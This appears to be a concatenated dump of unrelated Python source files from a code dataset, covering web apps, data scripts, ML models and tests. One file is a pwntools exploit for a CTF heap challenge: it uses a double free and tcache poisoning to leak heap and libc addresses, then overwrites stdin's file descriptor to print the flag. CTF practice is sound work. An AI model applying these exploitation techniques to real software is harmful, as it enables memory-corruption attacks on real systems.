2021-11-08 18:37:19.999345\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ef97ccd20ae6'\ndown_revision = '7d5703fb9531'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('cart', 'product_id',\n existing_type=sa.INTEGER(),\n nullable=False)\n op.drop_constraint('cart_beauty_product_id_fkey', 'cart', type_='foreignkey')\n op.drop_column('cart', 'beauty_product_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('cart', sa.Column('beauty_product_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.create_foreign_key('cart_beauty_product_id_fkey', 'cart', 'product', ['beauty_product_id'], ['id'])\n op.alter_column('cart', 'product_id',\n existing_type=sa.INTEGER(),\n nullable=True)\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ef97ccd20ae6_.py","file_name":"ef97ccd20ae6_.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"34662217","text":"import io\r\nimport numpy as np\r\nfrom pandas.core.frame import DataFrame,Series\r\nimport os,xlrd,xlwt,datetime\r\nimport pandas as pd\r\nimport re\r\nfrom datetime import datetime\r\n\r\n\r\n#about dictfuncmaper ,use zip ,for dict dict \r\n#the data better save in the xml file \r\n#static\r\nidir = os.path.abspath(os.path.dirname(__file__))\r\nbasedir = idir + '\\\\data\\\\'\r\ntodaystr = str(datetime.today()).replace(\"-\",'')[:8]\r\ntodaydetail = datetime.today()\r\n\r\nsrcdir = todaystr +'\\\\'\r\ndestdir ='\\\\format\\\\'\r\nfilename = 'bzdata.csv'\r\nsrcpath = basedir + srcdir + filename \r\ndestpath = idir + destdir \r\n\r\n\r\n#dynamic\r\n\r\ncfgpath = idir + '\\\\config\\\\'\r\n\r\n#Note that filter(function, iterable) is equivalent to the generator expression \r\n#(item for item in iterable if function(item)) if function is not None and (item for item in iterable if item) if function is None.\r\n\r\n\r\ncolheader = [\"Bug ID\",\"Status\",\"Risk Level\",\"Product\",\"Hardware\",\"Component\",\"Limitation Status\",\"Opened\",\"Deadline\",\"Release\",\"Platform Affected\",\"Tip Pointer\",\"Tip Status\"]\r\n#dumpin input with file path ,output with DataFrame\r\ndatadumpin = lambda path = srcpath : DataFrame(pd.read_csv(srcpath,sep= ','),columns=colheader )\r\n#dumpout input with DataFrame,output with csv file\r\ndatadumpout = lambda dataset,filez = 'bzdata.csv',index = False: dataset.to_csv(path =destpath+filez,index = index)\r\ndataputter = lambda dataset,dumpfile='dump.csv' : dataset.to_csv(idir + '\\\\format\\\\'+ dumpfile,index=False)\r\n\r\n\r\n#bootstrap\r\ngetconfig = lambda filename,header= 0: DataFrame(pd.read_csv(cfgpath + filename,header = 0))\r\nHWFrame = getconfig('cfg_hardware.csv')\r\nHWLIST = [ item[0] for item in HWFrame.values ] \r\ntrimbrace = lambda x: x if( x.find('(') == -1) else x[ :x.find('(') - 1 ] \r\nlisttrimbrace = lambda x : [trimbrace(item) for item in x]\r\nstatusmarker = lambda sts : {'Closed':'Closed','Rejected':'VrfORRjt','Verify':'VrfORRjt','Limitation':'Limitation','Fixed':'Fixed','Open':'OpenORWork','Working':'OpenORWork'}.get(sts, None) \r\n \r\nstscolumns = ['All','Closed','VrfORRjt','Limitation','LmtReq','LimTipRew','LmtAppv','Fixed','lmtwithapproved','lmtcandidate','Lev1','Lev2','Lev3','Lev4','Lev5et','Lev6','Lev11','duedAt5','duedAt6dl','duedAt6','dueFixed','dueFixnodl','sdvdued']\r\n \r\n\r\n \r\n\r\nCFGPROJECT = getconfig ('cfg_project.csv')\r\nCFGPROJECT['Project'].astype(str)\r\nCFGFUNCTION = getconfig ('cfg_function.csv')\r\nCFGFUNCTION['Function'].astype(str)\r\n#CFGFUNCTION['Product'] = CFGFUNCTION['Product'].str.split('/')\r\nCFGSTS = getconfig('stscolumns.csv')\r\ncfgmilestone = getconfig('cfg_milestone.csv')\r\ncfgmilestone['SDV_EXIT_DATE'].astype(datetime)\r\ncfgmilestone['SIT_EXIT_DATE'].astype(datetime)\r\n\r\nprojectmax = len(CFGPROJECT)\r\n\r\n#functon with local variavbles\r\n#funcmarker =lambda x : 
(CFGFUNCTION[CFGFUNCTION['Product'].str.contains('/'+x+'/')] ['Function']).tolist() \r\n#funcmarker =lambda x : ((CFGFUNCTION[CFGFUNCTION['Product'].str.contains('/'+x+'/')] ['Function']).tolist())\r\n\r\nfuncmarker =lambda x : ''.join((CFGFUNCTION[CFGFUNCTION['Product'].str.contains('/'+x+'/')] ['Function']).tolist())\r\n#funcmarker =lambda x : (CFGFUNCTION[pd.notnull(CFGFUNCTION['Product'].__contains__(x))]['Function']) if pd.notnull(CFGFUNCTION['Product'].__contains__(x))== True else 'Unkown'\r\nownermarker = lambda x: ''.join((CFGFUNCTION[CFGFUNCTION['Function'] == x ] ['GMO']).tolist()) if x == x else ''\r\n\r\n#for what class got the dataset\r\nrawdata = datadumpin()\r\nrawdata['BlockRevelent'] = False\r\nrawdata['BlockRevelent'].astype(bool)\r\nrawdata['Opened'].astype(datetime)\r\n#rawdata['Deadline'].fillna()\r\nrawdata['Deadline'].astype(datetime)\r\nrawdata['Hardware'] = rawdata['Hardware'].apply(trimbrace )\r\nrawdata['Platform Affected'] = rawdata['Platform Affected'].str.split(',')\r\nrawdata['Platform Affected'] =rawdata[rawdata['Platform Affected'].notnull()]['Platform Affected'].apply(listtrimbrace)\r\n\r\n","sub_path":"namedef.py","file_name":"namedef.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"617981984","text":"''\nimport pandas as pd\nimport numpy as np\nimport Stats\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n\n\ndf = pd.read_csv(\"data\\Credit-Scoring-Clean.csv\")\ndf = pd.DataFrame(df)\n# print(Stats.describe(ds,'Age'))\n\ncolumn = ['Duration','PresentResidenceTime','CreditAmount',\n 'InstallmentRatePecnt','Age','ExistingCreditsAtBank','CreditStatus1']\n\n\n# print(pd.DataFrame(ds,columns=header))\n\ndata = pd.DataFrame(df,columns = column).as_matrix()\n\nX = data[:, 0:5]\nY = data[:, 5:6]\n\nX_TRAIN,X_TEST = np.split(X,2,axis=0)#横向分割,分成2份\n# print(X_TRAIN)\n# print(X_TEST)\nY_TRAIN,Y_TEST = np.split(Y,2,axis=0)#横向分割,分成2份\n# print(Y_TRAIN)\n# print(Y_TEST)\n\n\n#### 简单神经网络\n#权值初始化,3行1列,取值范围-1到1\nW = (np.random.random([5,1])-0.5)*2\n\n#学习率设置\nlr = 0.11\n#计算迭代次数\nn = 0\n#神经网络输出\nO = 0\n\ndef update():\n global X_TRAIN,Y_TRAIN,W,lr\n O = np.dot(X_TRAIN,W)\n W_C = lr*(X_TRAIN.T.dot(Y_TRAIN-O))/int(X_TRAIN.shape[0])\n W = W + W_C\n\n\nfor _ in range(100):\n update()#更新权值\n n+=1\n print(W)#打印当前权值\n print(n)#打印迭代次数\n O = np.sign(np.dot(X_TRAIN,W))#计算当前输出\n if(O == Y_TRAIN).all(): #如果实际输出等于期望输出,模型收敛,循环结束\n print('Finished')\n print('epoch:',n)\n break\n\n # #正样本\n # x1 = [3,4]\n # y1 = [3,3]\n # #负样本\n # x2 = [1]\n # y2 = [1]\n\n#计算分界线的斜率以及截距\nk = -W[1]/W[2]\nd = -W[0]/W[2]\nprint('k=',k)\nprint('d=',d)\n\nxdata = (0,5)\n\nplt.figure()\nplt.plot(xdata,xdata*k+d,'r')\nplt.scatter(np.dot(X_TEST,W), Y_TEST, c='b')\n# plt.scatter(x2, y2, c='y')\nplt.show()\n","sub_path":"CreditSrcoe.py","file_name":"CreditSrcoe.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"422002142","text":"#!/usr/bin/python\n\n# ---------------- READ ME ---------------------------------------------\n# This Script is Created Only For Practise And Educational Purpose Only\n# This Script Is Created For http://bitforestinfo.blogspot.com\n# This Script is Written By\n#\n#\n##################################################\n######## Please Don't Remove Author Name #########\n############### Thanks 
###########################\n##################################################\n#\n#\n__author__='''\n\n######################################################\n By S.S.B Group \n######################################################\n\n Suraj Singh\n Admin\n S.S.B Group\n surajsinghbisht054@gmail.com\n http://bitforestinfo.blogspot.com/\n\n Note: We Feel Proud To Be Indian\n######################################################\n'''\n\nif __name__=='__main__':\n\tfrom Graphics import Tkinter as tk \nelse:\n\tfrom .Graphics import Tkinter as tk \n\n\nclass LineNumberCanvas(tk.Canvas):\n def __init__(self, *args, **kwargs):\n tk.Canvas.__init__(self, *args, **kwargs)\n self.text_widget = None\n self.breakpoints = []\n\n def connect(self,text_widget):\n self.text_widget = text_widget\n\n def re_render(self):\n \"\"\"Re-render the line canvas\"\"\"\n self.delete('all') # To prevent drawing over the previous canvas\n\n temp = self.text_widget.index(\"@0,0\")\n while True :\n dline= self.text_widget.dlineinfo(temp)\n if dline is None: \n break\n y = dline[1]\n x = dline[0]\n linenum = str(temp).split(\".\")[0]\n\n id = self.create_text(2,y,anchor=\"nw\", text=linenum)\n\n if int(linenum) in self.breakpoints: \n x1,y1,x2,y2 = self.bbox(id)\n self.create_oval(x1,y1,x2,y2,fill='red')\n self.tag_raise(id)\n\n temp = self.text_widget.index(\"%s+1line\" % temp)\n\n def get_breakpoint_number(self,event):\n if self.find_withtag('current'):\n i = self.find_withtag('current')[0]\n linenum = int(self.itemcget(i,'text'))\n\n if linenum in self.breakpoints:\n self.breakpoints.remove(linenum)\n else:\n self.breakpoints.append(linenum)\n self.re_render()\n \n \n\nclass LineMain:\n def __init__(self, text):\n self.text = text\n self.master = text.master\n self.mechanise()\n self._set_()\n self.binding_keys()\n\n def mechanise(self):\n self.text.tk.eval('''\n proc widget_interceptor {widget command args} {\n\n set orig_call [uplevel [linsert $args 0 $command]]\n\n if {\n ([lindex $args 0] == \"insert\") ||\n ([lindex $args 0] == \"delete\") ||\n ([lindex $args 0] == \"replace\") ||\n ([lrange $args 0 2] == {mark set insert}) || \n ([lrange $args 0 1] == {xview moveto}) ||\n ([lrange $args 0 1] == {xview scroll}) ||\n ([lrange $args 0 1] == {yview moveto}) ||\n ([lrange $args 0 1] == {yview scroll})} {\n\n event generate $widget <>\n }\n\n #return original command\n return $orig_call\n }\n ''')\n self.text.tk.eval('''\n rename {widget} new\n interp alias {{}} ::{widget} {{}} widget_interceptor {widget} new\n '''.format(widget=str(self.text)))\n return\n\n\n def binding_keys(self):\n for key in ['','',\"<>\",\"\"]:\n self.text.bind(key, self.changed)\n self.linenumbers.bind('',self.linenumbers.get_breakpoint_number)\n return\n\n def changed(self, event):\n self.linenumbers.re_render()\n #print \"render\"\n return\n\n\n def _set_(self):\n self.linenumbers = LineNumberCanvas(self.master, width=30)\n self.linenumbers.connect(self.text)\n self.linenumbers.pack(side=\"left\", fill=\"y\")\n return \n\n\nif __name__ == '__main__':\n root = tk.Tk()\n l=tk.Text(root)\n LineMain(l)\n l.pack()\n root.mainloop()\n","sub_path":"magicstick_tutorial_series_python_2_7_support_only/MagicStick_Editor_Part_14/magicsticklibs/LineNumber.py","file_name":"LineNumber.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"619551607","text":"print(4)\nfrom datetime import datetime\nfrom flask import Flask, json, jsonify, request\n#from 
flask_cors import CORS\nfrom engine.game.game import Game\n# from flask_json import FlaskJSON, JsonError, json_response, as_json\n# print(1)\ngame = Game(8)\napp = Flask(__name__)\napplication = app\n#CORS(app)\n# print(3)\n\n@app.route(\"/\")\ndef hello():\n # print(2)\n return \"Hello World!\"\n\n@app.route(\"/chessboard\")\ndef chessboard():\n board = game.board\n figures = game.figures\n figs = []\n for (i, arr) in enumerate(board):\n for (j, fig) in enumerate(arr):\n if fig is not None:\n figs.append({\"x\": i, \"y\": j, \"type\": board[i][j].__class__.__name__, \"color\": figures[i, j][2]})\n # print(i, j, board[i][j].__class__.__name__, figures[i, j][2])\n return jsonify(figs)\n\n@app.route(\"/move\", methods = ['POST'])\ndef move():\n\n json_data = request.get_json()\n check = game.move(json_data['to']['x'], json_data['to']['y'], json_data['from']['x'],\n json_data['from']['y'], game.figures)\n print(check)\n return chessboard()\n\n# print(5)\napp.run()","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"365550830","text":"# coding=utf-8\nimport base64\nimport base58\nimport six\n\nfrom .serialization1 import Serializable\n\n__all__ = [\n 'GenericData',\n]\n\n\nclass GenericData(Serializable):\n prefer_base58 = False\n\n def __init__(self, bytes_contents, content_type):\n if six.PY3:\n assert isinstance(bytes_contents, bytes), type(bytes_contents)\n self.bytes_contents = bytes_contents\n self.content_type = content_type\n\n def __repr__(self):\n return 'GenericData(%s, len %s)' % (self.content_type, len(self.bytes_contents))\n\n def params_to_json_dict(self):\n res = {}\n if GenericData.prefer_base58:\n encoded_bytes = base58.b58encode(self.bytes_contents)\n encoded_string = encoded_bytes.decode()\n res['base58'] = encoded_string\n else:\n encoded_bytes = base64.b64encode(self.bytes_contents)\n encoded_string = encoded_bytes.decode()\n res['base64'] = encoded_string\n res['content-type'] = self.content_type\n return res\n\n @classmethod\n def params_from_json_dict(cls, d):\n if 'base64' in d:\n base64s = d.pop('base64')\n\n bytes_contents = base64.b64decode(base64s)\n else:\n base58s = d.pop('base58')\n bytes_contents = base58.b58decode(base58s)\n content_type = d.pop('content-type')\n return dict(content_type=content_type, bytes_contents=bytes_contents)\n","sub_path":"duckietown-world-venv/lib/python3.6/site-packages/duckietown_serialization_ds1/builtin_dt.py","file_name":"builtin_dt.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"424126321","text":"import json\nimport sys\n\nfrom flask import (\n jsonify,\n request,\n make_response\n)\n\nfrom google.oauth2 import id_token\nfrom google.auth.transport import requests\n\n\n# Get Secrets Data\ntry:\n SECRET_DATA = json.loads(open('client_secrets.json', 'r').read())['web']\n CLIENT_ID = SECRET_DATA['client_id']\n CLIENT_SECRET = SECRET_DATA['client_secret']\n\n # Get the redirect uri from the file in the form of '/url'\n CLIENT_REDIRECT = SECRET_DATA['redirect_uris'][0]\n CLIENT_REDIRECT = '/%s' % (CLIENT_REDIRECT.split('/')[-1])\nexcept IOError as ioe:\n print('Error: Please download your \\'client_secrets.json\\' file from your \\'https://console.developers.google.com\\' project')\n print(ioe.pgerror)\n print(ioe.diag.message_detail)\n sys.exit(1)\n\n\ndef Google_Callback():\n user_data = 
None\n\n try:\n # Check if the POST request is trying to log in\n if 'idtoken' in request.form:\n # Get the token from the POST form\n token = request.form['idtoken']\n\n # Specify the CLIENT_ID of the app that accesses the backend:\n idinfo = id_token.verify_oauth2_token(\n token,\n requests.Request(),\n CLIENT_ID\n )\n\n verified_providers = [\n 'accounts.google.com',\n 'https://accounts.google.com'\n ]\n\n if idinfo['iss'] not in verified_providers:\n raise ValueError('Wrong issuer.')\n\n # ID token is valid.\n # Get the user's Google Account ID from the decoded token.\n userid = idinfo['sub']\n\n # Add the token to the flask session variable\n user_data = {\n 'name': idinfo['name'],\n 'email': idinfo['email'],\n 'picture': idinfo['picture']\n }\n\n except ValueError:\n # Invalid token\n print('Error: Unable to verify the token id')\n\n if user_data:\n user_data_json = json.dumps(user_data)\n else:\n user_data_json = None\n\n return user_data_json\n","sub_path":"google_authentication.py","file_name":"google_authentication.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"130368997","text":"import numpy as np \nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport matplotlib.pyplot as plt\n\nnum_points = 2000\n\nw_real = [0.3,0.5,0.1]\nb_real = -0.2\n\nx_data = np.random.randn(num_points , 3)\nnoise = np.random.randn(1, num_points) * 0.1\ny_data = np.matmul(w_real,x_data.T) + b_real + noise\ny_data = y_data.reshape(2000,1)\n\nmodel = Sequential()\nmodel.add(Dense(1,input_shape=(3,)))\nmodel.compile(loss = 'mse', optimizer = 'sgd')\nmodel.summary()\n\nhistory = model.fit(x_data,y_data,epochs=1000,verbose=0)\n\nweights, bias = model.layers[0].get_weights()\nprint(weights, bias)\n\nplt.plot(history.history['loss'])\nplt.legend(['train'],loc = 'upper left')\nplt.show()","sub_path":"machine-workspace/Keras/Ex03.py","file_name":"Ex03.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"182800226","text":"\"\"\"\nНаписати функцію, яка випадковим чином вертає число у проміжку від 0 до 100. ( random_100)\nВідповідно Написати функцію (summarizer). 
Яка містить змінну result=0.\nФункція summarizer викликає функцію random_100 і додає до суми рузультат.\nЯкщо результат більше 100 то надрукуйте результат.\n\"\"\"\nfrom random import randint\n\n\ndef random_100():\n return randint(0, 100)\n\n\ndef summarizer():\n result = 0\n while result < 1000:\n result += random_100()\n return result\n\n\nif __name__ == '__main__':\n print('The random summ higher than 1000 is {}'.format(summarizer()))\n","sub_path":"lesson2/task_functions3.py","file_name":"task_functions3.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"643496067","text":"import os\n\nimport pytest\n\nfrom crux.exceptions import CruxResourceNotFoundError\n\n\n@pytest.mark.usefixtures(\"dataset\", \"helpers\")\ndef test_stream_file(dataset, helpers):\n upload_path = os.path.join(\n os.path.abspath(os.path.dirname(os.path.dirname(__file__))),\n \"data\",\n \"test_file.csv\",\n )\n file_name = \"test_file_\" + helpers.generate_random_string(4) + \".csv\"\n\n file_1 = dataset.upload_file(local_path=upload_path, path=\"/\" + file_name)\n\n assert file_1.name == file_name\n\n stream = file_1.iter_content(decode_unicode=True)\n\n result = \"\"\n\n for chunk in stream:\n result += chunk\n\n assert \"bank\" in result\n assert \"location\" in result\n\n\n@pytest.mark.usefixtures(\"dataset\", \"helpers\")\ndef test_delete_file(dataset, helpers):\n upload_path = os.path.join(\n os.path.abspath(os.path.dirname(os.path.dirname(__file__))),\n \"data\",\n \"test_file.csv\",\n )\n\n file_name = \"test_file_\" + helpers.generate_random_string(4) + \".csv\"\n\n file_1 = dataset.upload_file(local_path=upload_path, path=\"/\" + file_name)\n\n assert file_1.name == file_name\n\n delete_result = file_1.delete()\n\n assert delete_result is True\n\n with pytest.raises(CruxResourceNotFoundError):\n file_1.delete()\n\n\n@pytest.mark.usefixtures(\"dataset\", \"helpers\")\ndef test_upload_file_string(dataset, helpers):\n upload_file_string = os.path.join(\n os.path.abspath(os.path.dirname(os.path.dirname(__file__))),\n \"data\",\n \"test_file.csv\",\n )\n\n file_1 = dataset.create_file(\n \"/test_file_\" + helpers.generate_random_string(4) + \".csv\"\n )\n\n upload_result = file_1.upload(upload_file_string)\n\n assert upload_result is True\n\n\n@pytest.mark.usefixtures(\"dataset\", \"helpers\")\ndef test_upload_file_object(dataset, helpers):\n upload_file_string = os.path.join(\n os.path.abspath(os.path.dirname(os.path.dirname(__file__))),\n \"data\",\n \"test_file.csv\",\n )\n\n file_os_object = open(upload_file_string, \"rb\")\n\n file_1 = dataset.create_file(\n \"/test_file_\" + helpers.generate_random_string(4) + \".csv\"\n )\n\n upload_result = file_1.upload(file_os_object)\n\n assert upload_result is True\n\n file_os_object.close()\n","sub_path":"tests/integration/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"522484407","text":"from django import forms\n\nsex_choices = (\n ('M', 'male'),\n ('F', 'female'),\n ('O', 'other'),\n)\n\neng_lvl = (\n ('A1', 'No knowledge of English'),\n ('A2', 'Elementary level of English'),\n ('B1', 'Low intermediate level of English'),\n ('B2', 'High intermediate level of English'),\n ('C1', 'Advanced level of English'),\n ('C2', 'Proficient in English'),\n)\n\n\nclass NameForm(forms.Form):\n your_name = forms.CharField(label='Your name', 
max_length=5)\n your_sex = forms.ChoiceField(choices=sex_choices)\n your_age = forms.IntegerField(min_value=0)\n your_eng_lvl = forms.ChoiceField(choices=eng_lvl)\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(label='uname')\n password = forms.CharField(label='pass')","sub_path":"38/mysite/myapp36/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"301383582","text":"plik = open(\"dane_6_1.txt\")\r\nplik1 = open(\"wyniki_6_1.txt\",\"w\")\r\nplik2 = open(\"dane_6_2.txt\")\r\nplik3 = open(\"wyniki_6_2.txt\",\"w\")\r\nplik3 = open(\"dane_6_3.txt\")\r\nwyrazy = []\r\nwyrazy1, klucze1 = [], []\r\nfor linika in plik:\r\n wyrazy.append(linika)\r\n\r\nfor linika in plik2:\r\n pom1, pom2 = linika.split(\" \")\r\n wyrazy1.append(pom1)\r\n if len(pom2[:-1]) == 0:\r\n klucze1.append(0)\r\n else:\r\n klucze1.append(int(pom2[:-1]))\r\n\r\nslowo1, slowo2 = [], []\r\nfor linika in plik3:\r\n pom1, pom2 = linika.split(\" \")\r\n slowo1.append(pom1)\r\n slowo2.append(pom2[:-1])\r\n\r\ndef szyfrowanie(wyraz, klucz):\r\n wynik = \"\"\r\n for litera in wyraz:\r\n pomoc = ord(litera) - 65\r\n pomoc += klucz%26\r\n if pomoc > 25:\r\n pomoc -= 26\r\n wynik += (chr(pomoc+65)) \r\n return wynik\r\n\r\ndef szyfrowanie2(wyraz, klucz):\r\n wynik = \"\"\r\n for litera in wyraz:\r\n pomoc = ord(litera) - 65\r\n pomoc -= klucz%26\r\n if pomoc < 0:\r\n pomoc += 26\r\n wynik += (chr(pomoc+65)) \r\n return wynik\r\n\r\ndef zad1():\r\n for wyraz in wyrazy:\r\n plik1.write(szyfrowanie(wyraz,107))\r\n \r\ndef zad2():\r\n for i in range(len(wyrazy1)):\r\n pomoc = (szyfrowanie2(wyrazy1[i],klucze1[i]))\r\n plik3.write(pomoc)\r\n plik3.write(\"\\n\")\r\n\r\ndef zad3():\r\n for i in range(len(slowo1)):\r\n wyniki = []\r\n pomoc1 = slowo1[i]\r\n pomoc2 = slowo2[i]\r\n for x in range(len(pomoc1)):\r\n roznica = ord(pomoc1[x]) - ord(pomoc2[x])\r\n if roznica not in wyniki:\r\n wyniki.append(roznica)\r\n if len(wyniki) > 2:\r\n print(pomoc1)\r\n\r\n\r\nzad3()\r\n\r\n\r\n\r\n \r\n\r\n","sub_path":"2016_6.py","file_name":"2016_6.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"316485477","text":"import tensorflow as tf\nfrom model.encoder_decoder import Encoder, Decoder\n\n\nclass Transformer(tf.keras.Model):\n def __init__(self, num_layers, d_model, num_heads, dff, input_vocab_size,\n target_vocab_size, rate=0.1):\n super(Transformer, self).__init__()\n self.encoder = Encoder(num_layers, d_model, num_heads, dff,\n input_vocab_size, rate)\n self.decoder = Decoder(num_layers, d_model, num_heads, dff,\n target_vocab_size, rate)\n self.final_layer = tf.keras.layers.Dense(target_vocab_size)\n\n def call(self, inp, tgt, training, enc_padding_mask,\n look_ahead_mask, dec_padding_mask):\n enc_output = self.encoder(inp, training, enc_padding_mask) # [batch, input_seq_len, d_model]\n\n # dec_output.shape == (batch, tgt_seq_len, d_model)\n dec_output, attention_weights = self.decoder(tgt, enc_output, training,\n look_ahead_mask, dec_padding_mask)\n\n final_output = self.final_layer(dec_output)\n return final_output, attention_weights\n\nif __name__ == \"__main__\":\n print(tf.__version__)\n sample_transformer = Transformer(\n num_layers=2, d_model=512, num_heads=8, dff=2048,\n input_vocab_size=8500, target_vocab_size=8000)\n\n temp_input = tf.random.uniform((64, 62)) # [batch, inp_seq_len]\n temp_target = 
tf.random.uniform((64, 26)) # [batch, tgt_seq_len]\n\n fn_out, _ = sample_transformer(temp_input, temp_target, training=False,\n enc_padding_mask=None,\n look_ahead_mask=None,\n dec_padding_mask=None)\n\n print(fn_out.shape)","sub_path":"model/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"361683423","text":"#!/usr/bin/env python2\nimport sys,os\nfrom pwn import *\n\ncontext.update(arch=\"amd64\", endian=\"little\", os=\"linux\", )\n\nLOCAL = True\nHOST=\"pwn.game.alcapwnctf.in\"\nPORT=31233\n\nTARGET=os.path.realpath(\"hiv\")\n\n# e = ELF(TARGET, False)\n\ndef create(num, typ):\n r.sendlineafter(\">> \",\"1\")\n r.sendlineafter(\"> \",str(typ))\n r.sendlineafter(\": \", str(num))\n return\n\ndef delete(typ):\n r.sendlineafter(\">> \",\"2\")\n r.sendlineafter(\"> \",str(typ))\n return\n\ndef show(typ):\n r.sendlineafter(\">> \",\"3\")\n r.sendlineafter(\"> \",str(typ))\n return\n\ndef exploit(r):\n # do double free to leak heap base\n create(1,1)\n create(2,2)\n delete(1)\n create(2,2)\n delete(1)\n\n # Leak the heap base\n show(1)\n heaplb = (int(r.recvline().split(\":\")[1])&0xffffffff)-0x260\n log.info(\"Heap lower bytes are {}\".format(hex(heaplb)))\n\n # While keeping the same data in 1st tcache bin, fill the 0th bin\n create(heaplb+0x260, 1)\n delete(2)\n create(heaplb+0x260, 1)\n delete(2)\n\n # Use the corruption in 0th bin to change size of bins in 1st bin\n create(heaplb+0x260-0x10, 2)\n create(2, 2)\n create(0xb1, 2)\n \n # Fill the 1st tcache bin 8 times to put chunk in unsorted bin\n for i in range(7):\n delete(1)\n create(2, 2)\n delete(1)\n \n # Leak the libc base\n show(1)\n libclb = (int(r.recvline().split(\":\")[1])&0xffffffff)-0x3ebca0\n log.info(\"Libc lower bytes are {}\".format(hex(libclb)))\n\n stdin_fd = libclb+0x3eba70\n\n # Overwrite the stdin fd \n create(stdin_fd, 2)\n create(1, 1)\n create(666, 1)\n\n # Trigger scanf to read flag from fd and print it\n r.sendlineafter(\">> \",\"4\")\n r.recvuntil(\":\")\n print(\"FLAG: \" + r.recvline().strip())\n r.recvall()\n r.close()\n return\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) > 1:\n LOCAL = False\n r = remote(HOST, PORT)\n else:\n LOCAL = True\n r = process([TARGET,])\n pause()\n\n exploit(r)\n\n sys.exit(0)\n","sub_path":"pwn/hiv/xploit_hiv.py","file_name":"xploit_hiv.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"190850753","text":"import sys\nimport re\nclass program:\n\tdef __init__(self,phrase):\n\t\tself.comp_stmt=CompoundStmt(phrase)\n\n\tdef eval(self,state):\n\t\tself.comp_stmt.eval(state)\n\n\nclass CompoundStmt:\n\tdef __init__(self,phrase):\n\t\tself.stmts=[]\n\t\tcounter=0\n\t\tj=0\n\t\t#print(phrase)\n\t\tstr2=[]\n\t\tfor x in phrase:\n\t\t\tif x.find(\";\")<0:\n\t\t\t\tx=x+';'\n\t\t\tstr2.append(x)\t\t\t\n\t\tphrase=str2\n\t\t#print(phrase)\n\t\twhile(j=0:\n\t\t\t\tself.k=i.split()\n\t\tf=re.findall(r\"(?<=begin;) (.*?) (?=return)\", str1)\n\t\tprint(f)\n\t\tself.func_part=CompoundStmt(list(filter(None,f[0].split(\";\"))))\n\t\t\n\tdef eval(self,newstate):\n\t\tif self.k[1].isalpha():\n\t\t\treturn newstate(k[1])\n\t\telse:\n\t\t\treturn 0\n\nclass IfelseStmt(Stmt):\n\tdef __init__(self,s):\n\t\tstr1 = ' '.join(s)\n\t\tself.flag=Cond(s[0])\n\t\t\n\t\tIf_part=re.findall(r\"(?<=then;) (.*?) 
(?=else;)\", str1)\n\t\tself.left=CompoundStmt(list(filter(None,If_part[0].split(\";\"))))\n\t\telse_part=re.findall(r\"(?<=else;) (.*?) (?=fi;)\", str1)\n\t\tself.right=CompoundStmt(list(filter(None,else_part[0].split(\";\"))))\n\t\n\tdef eval(self,state):\n\t\t#print(self.flag.eval(state))\n\t\tif self.flag.eval(state):\n\t\t\tself.left.eval(state)\n\t\telse:\n\t\t\tself.right.eval(state)\n\n\nclass WhileStmt(Stmt):\n\tdef __init__(self,s):\n\t\t\n\t\tstr1 = ' '.join(s)\n\t\t#print(str1)\n\t\tself.flag=Cond(s[0])\n\t\tWhile_part=re.findall(r\"(?<=do;) (.*?) (?=done;)\", str1)\n\t\tself.content=CompoundStmt(list(filter(None, While_part[0].split(\";\"))))\n\t\n\tdef eval(self,state):\n\t\t#print(self.flag.eval(state))\n\t\twhile self.flag.eval(state):\n\t\t\tself.content.eval(state)\n\t\t\nclass parameter(funcStmt):\n\tdef __init__(self,s):\n\t\tself.exps=[]\n\t\tcond=s.split()\n\t\tp1=cond[1].split(\"(\")\n\t\tp2=p1[1].split(\")\")\n\t\tparameters=p2[0].split(\",\")\n\t\tfor i in parameters:\n\t\t\tself.exps+=[Expression.build(i)]\n\tdef eval(self,state):\n\t\ta=[]\n\t\tfor i in self.exps:\n\t\t\ta+=[state[i]]\n\t\treturn 